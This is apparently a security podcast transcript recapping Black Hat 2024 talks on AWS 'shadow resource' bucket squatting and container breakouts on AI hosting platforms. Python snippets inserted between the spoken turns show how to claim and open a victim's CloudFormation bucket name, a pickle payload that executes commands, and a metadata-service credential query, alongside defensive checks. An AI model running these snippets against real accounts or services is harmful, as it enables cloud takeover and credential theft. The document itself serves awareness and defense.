BlackHat 2024 Day 1 Recap

Episode 300 –

On this episode of the podcast, we cover our two favorite briefings from the first day at the Black Hat security conference. We start with our thoughts on "shadow resources" in cloud environments before giving an update to last week's episode with additional research into AI-as-a-Service attacks.

View Transcript

Marc Laliberte  0:00  
Hey everyone, welcome back to The 443, Security Simplified. I'm your host, Marc Laliberte, and joining me is Corey

Corey Nachreiner  0:06  
hacker summer camp counselor, Nachreiner.

Marc Laliberte  0:09  
If you haven't already been told, or seen from the charred, well, not charred, but almost demolished husk of the Tropicana behind us, we are coming to you from Las Vegas during hacker summer camp, specifically the Black Hat and DEF CON security conferences, and today is going to be a special quick recap of just two of our favorite talks from today at Black Hat. We'll have another one coming for you tomorrow, and follow it up with a longer recap from DEF CON after the end of the weekend. Yep. So with that, let's go ahead and hack our way in, paddle

Corey Nachreiner  0:41  
our way in. It is summer camp, but there's no water here in the desert. So I guess not, there is no water, and it's 105 degrees.

Marc Laliberte  0:54  
So that's day one, that's a wrap. Corey, I guess what were your first, like, thoughts on today, the first day of Black Hat for 2024?

Corey Nachreiner  1:02  
I don't know, a good old, like, nostalgia, same old Black Hat. I guess we still have the AI buzzwords this year. It seems to be AI and disinformation and state-sponsored fraud, those are the big buzzwords, probably.

Marc Laliberte  1:18  
Yeah. And you mentioned, like, same old, new, whatever. But one thing that stood out to me was the keynote this year was back in the main, like, arena at Mandalay Bay. The last couple years it's just been in one of the expo halls, I think because Black Hat had condensed, yeah, into one of the Oceanside ballrooms, because it had gotten smaller over the past couple of years post-COVID. But this was our first time back in the main, giant arena.

Corey Nachreiner  1:43  
So, huge arena, how full was it, Marc? Because one thing I noticed, tons of people in the hallway, it feels like it's back. But then, I don't know if I just picked bad talks, although some had big names, but the briefings aren't quite as full. There's these huge rooms, and it's maybe 10 to 20% of people in there, I'd say.

Marc Laliberte  2:04  
So the keynote was 80% full or so. That's, that's impressive. But I did notice, I think they made the briefing rooms larger than they needed to, yeah? And that's probably why it looks like it's pretty empty. Like, mine were not full, but had a lot of people, in giant enough rooms that it was still kind of sparse. Yeah, same for me. But I guess before we get into just, like, two of our favorite talks that we saw today, I wanted to go over, so, every Black Hat starts with the keynote from Jeff Moss, the founder of Black Hat.

Corey Nachreiner  2:33  
He's never on the agenda, but he always comes out like it's some sort of surprise. I'm like, we know you're coming, Moss, yeah.

Marc Laliberte  2:40  
Exactly, this time he showed up in, like, sparkly shoes, and he made some joke about hoping to blind everyone in the audience with lasers off of them at some point.

Corey Nachreiner  2:47  
There's no place like home. He needs them to be WatchGuard red glitter.

Marc Laliberte  2:51  
Yeah, there we go. But he talked about quite a few different things. One thing that really stood out for me from the keynote was he was just talking about our current, like, geopolitical landscape and cybersecurity and how they fit together. And he had some interesting examples, just interesting, like, thought-provoking things. Like, first off, he mentioned, you know, right now in the 21st century, when there's warfare, it's not just kinetic warfare, it's cyber warfare too. But there's some really interesting differences in, like, the blast radius and collateral damage. It's like, in kinetic warfare, if you shoot a plane out of the sky and it crashes into the ground, the sky is still there and the ground is still there, it's just the plane that's gone. If you sink a ship, the ship is gone, but the sea is still there. In cybersecurity, if you try and impact some service, generally you will affect the landscape as well. And also, on the flip side, like, the sky, you know, it could be windy one day, hot one day, low air pressure, high air pressure, but it's generally the sky, it doesn't change a whole lot. Same with the ocean, it's generally the ocean, it could be bumpy, it could be flat. In cybersecurity, we as, like, technology providers or technology consumers constantly change the environment that the warfare is being fought in, which is really interesting.

Corey Nachreiner  4:09  
Like you just said. And I don't think we realized the supply chain implications of all the ecosphere we have in cyber. Like, this was not an attack, but the CrowdStrike issue that happened showed how a technology issue, in the case of cyber warfare, could have huge implications across many industries that you may not even think about. So it sounds like it's similar to that, exactly. I missed the keynote, unfortunately.

Marc Laliberte  4:36  
Well, I got two more tidbits for you that I want your thoughts on. The second one was, he discussed the fact that there's actually a lot of technology companies, and specifically cybersecurity companies, based in Israel, because they've got an extremely strong intelligence, like, government intelligence apparatus and mandatory conscription, meaning a lot of people will go through that, come out experts in their field, and go start a company and be very successful. Yeah. And on the flip side, there's a lot of development operations in Ukraine, and so now we're seeing two of these nations, effectively, one directly in war, one really starting to go to war, and that's causing a lot of disruption for companies that are based out of there. He gave one example of an unnamed security company that's actually at Black Hat this year, where their entire development operations was based in Kyiv. And so once that war broke out, they had to have a very frank conversation of, you know, we're not replacing you, we need to set up redundancy so that when this is done, you have a company to come back to. And his whole thing was about, like, now we're having to have these difficult conversations as, unfortunately, our geopolitical landscape is, pardon my French, kind of going to hell right now. Yeah. So the last point was, in the world of cybersecurity, and just in the world of IT and services, we all use so many different applications. Like, our tech stack at WatchGuard has, like, 100 different applications in there. When it comes to organizations that are trying to stay neutral, like the International Red Cross, that specific example, when the Russia-Ukraine war broke out, they're trying to stay neutral in this to the best of their ability. But then you look at their hosting providers, and Microsoft is clearly taking an anti-Russian stance at this point, because they're under attack from Russia.

Corey Nachreiner  6:28  
So that could affect the Red Cross's infrastructure if they were doing deployments.

Marc Laliberte  6:32  
Exactly. So their infrastructure is based in the Azure cloud, for example, and so for them, like, can they stay independent if the tools and services they're using are not independent, if they actually had been swayed one way or another? And he went through, it was a thought experiment for everyone, of, like, we're coming to a point where there is not going to be any independent technology company. Like, at some point, everyone's going to have a side on something. And what does that mean if you are trying to remain international, or, you know, something like the American or the International Red Cross, or, let's say, a country that needs neutrality, like Singapore or other smaller countries?

Corey Nachreiner  7:18  
It's interesting, like, that's why, I think, you and I have talked about it in a different way. This wasn't necessarily in the keynote, but, like, Chinese companies. There's a lot of companies, even ones I like, like DJI, but because of politics and national security, DJI is apparently banned now in the United States for sale, because they could be affected by the Chinese government. So it's going to happen both ways. Not just, yes, there's a lot of technology companies with, you know, the Five Eyes governments and our NATO friends, but there's companies out there with good products, at least on the surface, that will be in the other countries too, and it'll be interesting.

Marc Laliberte  7:55  
And there's also companies that are becoming collateral damage, if you could call it that, because of geopolitical tensions. One example he gave was, you know, China and India have been, like, butting heads back and forth on a lot of geopolitical issues. And so, what was it, a year ago, year and a half ago, India goes, okay, what's in our tool belt? Fine, we're banning TikTok. Take that, China. And China, this is asymmetrical, like, China already bans everything, and so they can't turn around and say, oh, let's find an Indian app and ban that in ours. No, it's an asymmetrical type of action you could take. So it was really interesting. Like, I thought that was a great keynote, a great opening for the conference, and it just kind of set the playing field.

Corey Nachreiner  8:37  
Is this like the cyberpunk dystopian future? Like, are we literally, now, is it that democratic governments are crumbling, and soon the big private tech companies are going to be the new governments of the globe?

Marc Laliberte  8:49  
Honestly, it kind of feels like that, now that you put it that way. We're definitely getting a little bit closer to that, with Microsoft and Google and Apple running the entire world and taking sides along the way. So anyways, that was the keynote. Now, I think just for this short episode, we'll try and pick just one talk each that we thought was really interesting, but we will have a recap at the end of all of hacker summer camp week, with maybe some more from today or other days. But I guess, Corey, for you first, what was an interesting talk you saw that you really liked?

Corey Nachreiner  9:20  
Yeah, there were so many, but some of them are technical, so I might save those for the longer recap. But one I really liked was something that was called Breaching AWS Accounts Through Shadow Resources, and it was given by a team of three researchers from Aqua Security. I will murder their names, but I'll try: Yakir Kadkoda, Michael Katchinskiy, and Ofek Itach, hopefully I'm not killing those. Nailed it. Aqua Security, though. But basically, they were talking about how a lot of AWS services create resources behind the scenes that you may not know about, and talked about ways you can actually do a lot of different types of attacks on these AWS services if you know about this. So one of the first things they started with is just mentioning the AWS account ID, which is a 12-digit, supposedly unique ID. Some people treat it as a secret, but it's actually not a secret; even the AWS docs say do not consider this a secret. That's only important because sometimes they'll talk about things like S3 buckets that are being created behind the scenes. Sometimes those might have a hash, but also sometimes you can find access to them through these account IDs. In either case, I think they were building off some research that was done on CloudFormation, and they showed, basically, when you're creating a new CloudFormation template, when you're just going to use that service for the first time, you may not realize that the first time you created a template, even though you might have created S3 buckets for your own use, behind the scenes it's creating an S3 bucket for you to store that template and other resources that might be available for that service. And it's creating it in the region you're in; it's not necessarily creating it for every region. I didn't know if you wanted to add something, yeah.

Marc Laliberte  11:08  
So, just real quick for the non-DevOps folks: CloudFormation is the infrastructure-as-code option within AWS for spinning up resources using code versus clicking through the console. And S3 buckets, by now everyone should know what S3

Corey Nachreiner  11:23  
buckets are for, for AWS. So anyways, the fact that these S3 buckets are being created automatically, without the user really knowing unless they pay attention, was essentially the issue. And part of the issue is, imagine you are just creating this in one region. If a threat actor can figure out the hash for that S3 bucket, or the account ID, they could go into other regions. And these S3 buckets have to have a unique name. Usually that unique hash is going to be yours, but if someone can beat you to another region and create it, it's now the only one available in that region. So basically, with this CloudFormation injection attack that they were building their research off of, they would then find different ways you might be able to find that hash. And that's not trivial, by the way; the hash is something that has, like, astronomical permutations for what it could be.

Marc Laliberte  12:21  
It's basically like a form of, like, a UUID, just condensed a little bit.

Corey Nachreiner  12:25  
Exactly, hashed instead of, and you could use the full UUID if you wanted to, but the hash is what primarily works. But they found, by doing a lot of crawling of GitHub, of the web, of all kinds of places, that unfortunately people don't realize what they're sharing, or don't delete their links sometimes, and they might publicly share a link that has this hash in it. And that's how they were able to find, you know, lots of different buckets that they could do this attack for. And then they would create a bucket in a new region. Now, right away, that could create a denial-of-service issue, because if you're an organization that created the real CloudFormation setup in one region, and now you try to go into another region, by default you would be locked out, because the bucket's not publicly available and someone else owns it. So the CloudFormation stack construction would fail in that region. But they also found that all you have to do is change the S3 bucket defaults to just allow public access to the bucket, and change access control to everyone, and now CloudFormation wouldn't fail, but it adds your template to an attacker-controlled bucket, and you can understand how everything falls down at that point. They can then use that template to start doing things like creating IAM roles. They could modify resources. They could essentially get admin.

Marc Laliberte  13:39  
If you have any secrets that you put as parameters in there, which you should not be doing, but some organizations still do, they'd

Corey Nachreiner  13:45  
have that, for sure. That's nuts. All kinds of read and write issues. But basically, that was what they built the research off of. I'm not going to go into detail for every one, but then they looked at the Glue service. Same thing: when Glue is first used in an account, it will create a bucket, and it places a Python script in there, and you can then inject stuff into that Python script, including an invisible backdoor that will run code that you're not going to see in your logs. EMR, another service: when you create a Studio, it makes a bucket, and that one has a Jupyter notebook. You can modify that notebook to add any sort of JavaScript you want, so that when the victim, you know, creates that Jupyter notebook in a new region, they have that Jupyter notebook where you're injecting cross-site scripting into their own browser. SageMaker has one, another thing called CodeStar has one, and Service Catalog has an issue too, which they haven't disclosed yet; they'll publish it a little bit later. So the whole point is, there's a lot of services that are making these shadow resources behind the scenes, and then it's just figuring out the account ID or hash, and a race condition to beat them to the regions.

Marc Laliberte  15:00  
Even talking, like, when, sorry, when we talk about race conditions, I'm usually imagining, like, a, you know...

Corey Nachreiner  15:04  
Yeah, you're thinking I used it in a bad way. We're thinking computer CPU timing attacks that are very quick. This is a race condition you have a much higher chance of winning.

Marc Laliberte  15:16  
If a company, like, suddenly WatchGuard decides they want to spin up points of presence in, like, us-east-1...

Corey Nachreiner  15:21  
You'd have to fill all, is it 33 or 34, regions at once to kind of prevent this? So basically free, like, yeah,

Marc Laliberte  15:29  
effectively free, if you don't have it there already...

Corey Nachreiner  15:31  
And this is specialized, remember, this is kind of like a background bucket in the account that you don't necessarily really know about. It's just part of where the service is storing its own local resources. And that's why they talked about the Bucket Monopoly attack, which is where, once they find that one hash, if you think about it, for each of these services they can create 33 potentially backdoored S3 buckets just waiting for you to come to the region. Then you multiply this by all the services they found it in, and there's, like, 100 just minefields sitting there waiting for you to move to that region, and now they can do all kinds of bad stuff.
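To make that race concrete, here is a minimal, hypothetical sketch of what claiming one of these names in an unused region could look like, assuming the cf-templates-<hash>-<region> naming pattern described in the Aqua research; the hash and region below are made-up placeholders, not anything from the talk.

```python
import json
import boto3

# Placeholder values: an attacker would have learned this hash from a
# leaked URL on GitHub, a paste site, a forum post, and so on.
LEAKED_HASH = "abc123def456"
TARGET_REGION = "eu-west-3"  # any region the victim hasn't used yet
bucket = f"cf-templates-{LEAKED_HASH}-{TARGET_REGION}"

s3 = boto3.client("s3", region_name=TARGET_REGION)

# S3 bucket names are globally unique, so whoever creates this name
# first owns it, across every AWS account, from then on.
s3.create_bucket(
    Bucket=bucket,
    CreateBucketConfiguration={"LocationConstraint": TARGET_REGION},
)

# The trick Corey describes: open the bucket up so the victim's
# CloudFormation run doesn't fail, it just quietly reads and writes
# templates in a bucket someone else controls.
s3.delete_public_access_block(Bucket=bucket)
s3.put_bucket_policy(
    Bucket=bucket,
    Policy=json.dumps({
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": "*",
            "Action": ["s3:PutObject", "s3:GetObject"],
            "Resource": f"arn:aws:s3:::{bucket}/*",
        }],
    }),
)
```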

Marc Laliberte  16:07  
And Bucket Monopoly is, like, the perfect descriptor for this one.

Corey Nachreiner  16:11  
Yes, so that was fun. They had a lot of mitigations, which are AWS commands that aren't easy to share on the podcast, but we'll be sure to have links at some point, maybe in the final summary podcast, where you can find some resources.

Marc Laliberte  16:24  
Yeah, interesting. So I guess, I mean, trying to think of, like, what you could do as a, like, DevOps administrator in this case. I'm sure the mitigations will cover it, but, like, you don't necessarily want to plan ahead and, like, set this up in every region. I wonder if...

Corey Nachreiner  16:38  
No, that was the brute-force, dumb way to do it. There was a specific command that you could do. I have a picture of it on my phone, I forget exactly what it was, that would generally mitigate this from happening at all. So at the end of the day, it looks like there's some console thing that you could do to protect yourself.
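Corey doesn't read out the exact command, so treat this as an assumption: one mitigation Aqua has discussed publicly is scoping the IAM permissions on these service buckets with the aws:ResourceAccount condition key, so a look-alike bucket squatted in someone else's account is rejected. A minimal sketch of that policy, with a placeholder account ID:

```python
import json

# Hypothetical policy fragment: only allow S3 actions on cf-templates-*
# buckets when the bucket actually lives in YOUR account, which defeats
# a squatted look-alike bucket owned by an attacker.
policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": "s3:*",
        "Resource": "arn:aws:s3:::cf-templates-*",
        "Condition": {
            "StringEquals": {"aws:ResourceAccount": "123456789012"}
        },
    }],
}
print(json.dumps(policy, indent=2))
```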

Marc Laliberte  16:55  
Okay, that's good. And in the meantime, though, if you are about to deploy a new stack to another region, maybe just check a little bit beforehand to make sure that the auto-generated bucket with your hash doesn't already exist.

Corey Nachreiner  17:07  
And as you're sharing, like, Amazon links, I mean, you'll see this hash show up in some links. Just think about that, and your account ID: while it's not supposed to be a secret, there's no reason to spread it around, so try to avoid it. And when you're sharing any sort of Amazon links in a public place, just be cognizant of the parameters, because there might be information in the parameters that gives bad guys a little bit of help to target you.
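As a rough sketch of the pre-deployment check Marc suggests, again assuming the cf-templates naming pattern from above (the hash is a placeholder, so verify the real bucket name in your own account first):

```python
import boto3
from botocore.exceptions import ClientError

ACCOUNT_HASH = "abc123def456"  # placeholder: copy from your real bucket

s3 = boto3.client("s3")
ec2 = boto3.client("ec2")
regions = [r["RegionName"] for r in ec2.describe_regions()["Regions"]]

for region in regions:
    name = f"cf-templates-{ACCOUNT_HASH}-{region}"
    try:
        # HEAD succeeds only if the bucket exists and we can access it.
        s3.head_bucket(Bucket=name)
        print(f"{name}: exists and is accessible (probably yours)")
    except ClientError as err:
        code = err.response["Error"]["Code"]
        if code == "404":
            print(f"{name}: unclaimed, could still be squatted")
        elif code == "403":
            # Exists but belongs to someone else: the red flag to chase.
            print(f"{name}: exists but NOT accessible, investigate")
```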

Marc Laliberte  17:32  
That's nuts. That sounds like a really good talk. The one that I really liked is actually a follow-up to our episode last week, or the week before. If you remember, we were talking about research from Wiz Security, which, I confirmed, we know the pronunciation now. It's Wiz, not Wise. I was wrong.

Corey Nachreiner  17:51  
It was a whiz on your pronunciation of it.

Marc Laliberte  17:54  
Exactly. Now, this one was named the same as, like, the article that we originally read, which was Isolation or Hallucination, Hacking AI Infrastructure for Weights and Profit, or something. It was by two folks whose names I'm gonna totally butcher, so I'm just gonna call them Hillai Ben-Sasson and Sagi Tzadik, and hope that came out right. But anyways, it was two researchers from Wiz talking about just a fun little research project they had, to look for issues in artificial intelligence as a service, or AIaaS as they called it: different platforms that allow you to either run your own models on their platform, or train your models on their platform, or really a whole bunch of services around artificial intelligence. The reason these exist, by the way, is not all of us can afford to go buy 10,000 NVIDIA GPUs and set up a GPU farm to train and run AI models, and so these service providers can offer them as a service instead. And they picked three that they talked about in the talk. One of them is the one we chatted about on that last episode, which was SAP's AI platform as a service. But the other two were really interesting as well. So the first one is one I had heard of before. The platform's called Hugging Face, which is the dumbest name.

Corey Nachreiner  19:16  
I've never heard of that, correct, but it makes me think of, like, the alien.

Marc Laliberte  19:20  
They have a cute little, like, emoji, an emoji hugging you, as the icon for it. But despite the stupid name, it's one of the most prominent, like, repositories slash package indexes for open-source AI models. Think of it like a GitHub for AI models, where people can upload their model and a description to show off, like, what they trained it to do. For example, when I was looking for some AI models internally for helping, like, translate weather predictions into an image generator, for some image that summarizes the weather. You and your cool background projects. This is for my stupid little, like, Home Assistant tablet back at home. There were some fun models in there that could, like, get some of the legwork out of the way for me. I ended up just paying OpenAI 20 bucks a month instead and using theirs, but I was looking for the free options anyway. So, Hugging Face: think of it like GitHub for open-source AI models. One of its features, though, is you can upload a model, and it actually exposes a way to interact with that model through their platform. So, in the world of artificial intelligence, when you submit a prompt to a model and it does something and returns the result back to you, that's called inference; that's the fancy word for it. And so you can do inference actions with models that are uploaded to Hugging Face, just through their platform, and it uses, like, infrastructure hosted by Hugging Face, in their cloud or application or whatever. And you might see where this could be a potential issue there. So, AI models: there's a bunch of different ways to package them, and one of the most popular ways is just the plain old Python pickle. If you're not familiar with Python pickling, it's basically a way to serialize Python data. So serializing is taking, like, the data from a script or something and converting it into just an object you can save on your storage device or transmit across a network. And pickle is the library that can take, like, a Python function, a class, or even just a simple, like, list or object, and serialize it down into a file, and then load it back up into what it was. Python pickle, if you go to the documentation, on, like, page one there's this big red box that says, warning, do not use this on untrusted code or untrusted data, because basically anyone that gives you a pickle can gain code execution when you deserialize it. There's a built-in function called import, it's like underscore underscore import underscore underscore, that you can set as a part of your pickle, and when the Python script that's executing it tries to load it, it'll load up that function and execute whatever's in it. So what they found was, on Hugging Face, they can upload their own model as a pickle file. As a proof of concept, they took, like, a legitimate model of just some AI chatbot thing, and they overwrote that import function on it with a malicious function that basically said, anytime I say the magic word, execute this command. It's not, like, the AI doing it; it bypasses the AI and actually runs the command on the underlying operating system. When they first tested it, they just did a, like, whoami, and saw it was running as root, which was interesting, that was exactly his word for it. That's always lovely to see. But then they set it up to create a remote shell, which they could then use netcat to connect back into. They basically had root access to the container that this thing was running on in Hugging Face's infrastructure.
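For anyone who wants to see the shape of the pickle problem Marc is describing, here is a minimal, hypothetical sketch using pickle's standard __reduce__ hook, which is the usual way payloads like the __import__ trick get wired in. This is not the researchers' actual payload, just the textbook pattern:

```python
import pickle


class NotReallyAModel:
    # __reduce__ tells pickle how to rebuild this object. A malicious
    # file can return any callable plus arguments, and pickle.loads()
    # will call it during deserialization, before any "model" code runs.
    def __reduce__(self):
        import os
        return (os.system, ("whoami",))  # harmless demo command


payload = pickle.dumps(NotReallyAModel())

# The victim side: merely loading the file executes the command.
pickle.loads(payload)
```

Run it and you'll see the whoami output print, which is exactly why the pickle docs carry that big red warning about untrusted data.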

Corey Nachreiner  23:00  
I assume whatever it was running on had a lot of resources or power.

Marc Laliberte  23:03  
Well, so the way that almost all of these AI-as-a-service providers run their models is through Kubernetes clusters. And so this was an individual container in a pod full of other containers for other people's functions, in a cluster full of a whole bunch of pods. And so they had root in their one container, but right now, that was it. But what they...

Corey Nachreiner  23:28  
"Right now," those are some foreboding words there, Marc.

Marc Laliberte  23:31  
So these are seasoned cloud security experts from Wiz, and they pulled out all the tricks that they typically use for penetration testing engagements on Kubernetes-based systems. One of the first things they look for is, what is, like, the role attached to that container, like, what are the permissions on it? The downside was, it actually didn't have a whole lot of permissions on it at all; they couldn't directly elevate that to, like, access to the whole cluster. The upside, from a hacker perspective, was that the cluster actually had the IMDS, the instance metadata service, like an administrative config endpoint, totally visible and accessible from any container in there. So they were able to basically query this, gain the credentials, and elevate their role for their cluster. This is the thousand-foot level for how they actually did this. Basically, they were able to assume a role within their cluster that then gave them access to the entire Kubernetes cluster and everything that's running within Wiz's, or not Wiz's, within Hugging Face's infrastructure. So, long story short, they were able to gain write and read access to all public and private models, including system ones that Hugging Face themselves run, within this entire infrastructure. Crazy. That was the first one. The second one was targeting another, like, similar repository called Replicate. So Replicate, they don't use pickles. They use their own kind of, not proprietary, but custom container called a Cog. And it's basically, think of it like a Docker container; like a Docker container, you control everything that happens in that container when it loads up and runs. And so they created a malicious container where, inside there, they modified the script that's responsible for loading the model that's supposed to be in there, and instead of loading that model, it just creates a remote shell and gives them access into the container when it runs. Like Hugging Face, they got root on that container within the pod, but in this case they actually didn't have, like, any permissions within the Kubernetes cluster itself. But they did some poking around, and they ultimately ran, like, netstat on there, and they found an open connection where they couldn't see the process info for it, which, long story short, meant that their container was sharing a network namespace with another container. In this case, spoiler alert, it was the management container that was running within the same pod. Think of a pod as basically just a virtual machine, and on that virtual machine you have even more tiny virtual machines running. And so that connection they found was actually a connection to a Redis server. Redis is, like, think, like, a data store, like, a queuing system, in this case for the services that are running on this service provider, whose name I already forgot... Replicate. So, through this, because they had root on their server, and because it shared the same network namespace and that connection was already open, they didn't need to authenticate to the Redis server. It had authentication.
They didn't know the username and password, but they could use TCP injection and just inject arbitrary packets into this existing session, exactly, which then let them effectively gain full access to that Redis server, which gave them full access to every prompt that users submitted into this platform, and the results, the inference, that came back from the models. And so, through that, read and write access, basically, to any model that is running, or the ability to tamper with any other customer's stuff. So those were two, like, pretty nuts ones. And, like, my main takeaway from this wasn't actually, like, for AI as a service specifically. It was more, like, these are some basic, maybe not basic, but important Kubernetes security items, where, if you're running untrusted workloads in a cluster, or, like, a mixed environment, there's a lot of different ways to break out of a container and potentially impact the entire environment.
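As a rough illustration of the metadata-service exposure in the Hugging Face chain, here is a sketch of the kind of query a pod can make when it's allowed to reach the IMDS. The endpoints are the standard AWS IMDSv2 ones; treat it as a demonstration of why clusters should block pod access to 169.254.169.254, not as the researchers' exact steps:

```python
import urllib.request

IMDS = "http://169.254.169.254/latest"

# IMDSv2: fetch a short-lived session token first.
token_req = urllib.request.Request(
    f"{IMDS}/api/token",
    method="PUT",
    headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
)
token = urllib.request.urlopen(token_req, timeout=2).read().decode()

def metadata(path: str) -> str:
    req = urllib.request.Request(
        f"{IMDS}/meta-data/{path}",
        headers={"X-aws-ec2-metadata-token": token},
    )
    return urllib.request.urlopen(req, timeout=2).read().decode()

# Name of the IAM role attached to the node, then its temporary
# credentials. A pod that can do this inherits the node's permissions,
# which is the "elevate their role" step Marc describes.
role = metadata("iam/security-credentials/").strip()
print(metadata(f"iam/security-credentials/{role}"))
```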

Corey Nachreiner  27:43  
At the end of the day, these aren't AI vulnerabilities, so to speak. But I would still argue, on the business side of things, AI is affecting it, in that AI is a buzzword right now that can make a lot of money, and people are rushing to push whatever AI-based services they can at the speed of light. So it feels like, and this is just my take on a presentation I didn't see, that in designing AI as a service, we're rushing things like we always do with new-to-market innovation. We're forgetting security by design, and they're not paying attention to back-end infrastructure security. And that's not new. Well, I guess it is still new to some people, cloud, Docker, Kubernetes; it's more complex security than the old-school on-prem stuff, but it's security that is well defined. And so maybe AI being rushed to market isn't a good thing, not because there's a ton of vulnerabilities in the models themselves, but because of all these back ends we're building without thinking about the repercussions.

Marc Laliberte  28:48  
I think that's a very good point, because AI right now, it feels like a gold rush of sorts, not necessarily in terms of, like, everyone's gonna get a return, but everyone's trying to get a return. And going fast, you gotta go as fast as you can, and potentially cut corners. And this is where this type of issue can manifest and just totally screw your entire setup.

Corey Nachreiner  29:08  
It's even hard for us as security folks at our organization, and I imagine for you at yours, in that there's so much power to machine learning and AI that we really want to take advantage of, and we are taking advantage of, but we have to remind ourselves to at least slow down to research the right ways to do certain things, because it's easy to fall into old traps.

Marc Laliberte  29:31  
Yeah, very well said. So that was, I mean, one of, I think, three talks I liked.

Corey Nachreiner  29:36  
And I have a few more we can do in the summary, and one is AI-related that was interesting to me.

Marc Laliberte  29:41  
Yeah, so, I mean, with that, that's the end of this short recap episode. We'll have another one tomorrow, and then we'll have a larger one, probably during our normal podcast time next week. But yeah, man, good day one in the books. Felt like a bit of a whirlwind. I'm looking forward to tomorrow and then, of course, DEF CON over the weekend too.

Corey Nachreiner  30:01  
I'm sure we'll be tired by Sunday.

Marc Laliberte  30:03  
Yeah, my feet are already killing me. Hey everyone, thanks again for listening. As always, if you enjoyed today's episode, don't forget to rate, review, and subscribe. If you have any questions on today's topics, or suggestions for future episode topics, you can reach out to us on Instagram at @watchguard_technologies. Thanks again for listening, and you'll hear from us tomorrow,

Corey Nachreiner  30:28  
or whenever we post the second day.